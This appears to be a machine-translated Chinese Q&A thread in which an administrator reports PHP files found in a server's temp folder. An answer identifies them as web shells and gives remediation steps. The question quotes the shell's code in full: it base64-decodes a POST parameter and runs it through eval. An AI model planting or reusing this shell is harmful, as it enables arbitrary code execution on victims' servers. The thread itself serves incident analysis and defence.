PHP代碼

Question

我已經注意到，我們的臨時目錄中有許多東西似乎與像phpA3F9.tmp

名稱展望，我覺得一個數字後面的內容臨時文件通過一些PHP代碼，下面的代碼將出現在幾個文件中

9990000  
<?php 
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?> 

這似乎是一種攻擊嘗試，但我相信它依賴於攻擊者能夠在TMP文件夾中執行代碼。

有人可以解釋這裏發生了什麼嗎？有什麼風險？這些文件如何進入tmp文件夾？我該如何阻止他們？

我不知道，但如果是相關的，我們在IIS

運行PHP 5.5

Answer 1

短篇小說：您的服務器可能已經被泄露。

這些都是PHP shell - 大部分都是無害的，但是如果它們進入你的web根目錄，它們將允許攻擊者在你的服務器上執行任意代碼。

理解外殼關鍵部件是：

$xsser=base64_decode($_POST['z0']); 
@eval("\$safedg = $xsser;"); 

它接受任何代碼從一個$_POST可變可言，base64_decode的IT，然後運行它通過eval同時抑制任何錯誤。

它們有可能通過網站上的表單上傳，並作爲中間步驟被轉儲到臨時文件夾中，希望它們能夠移入網絡可訪問的位置。另一種選擇是你的服務器上已經有了一個shell或rootkit，並且將這些文件放在它可以找到的任何可寫文件夾中。

那該怎麼辦呢？檢查你的服務器日誌 - 如果你看到任何成功的腳本連接，你不認識，你可能會被入侵。在您的網站上查找任何上傳表單，並將其鎖定（需要用戶身份驗證等），然後如果您確定自己已被盜用，請不要打擾進行清理。啓動一臺新服務器，將您的代碼，重要文件和數據清理清潔遷移到乾淨的服務器。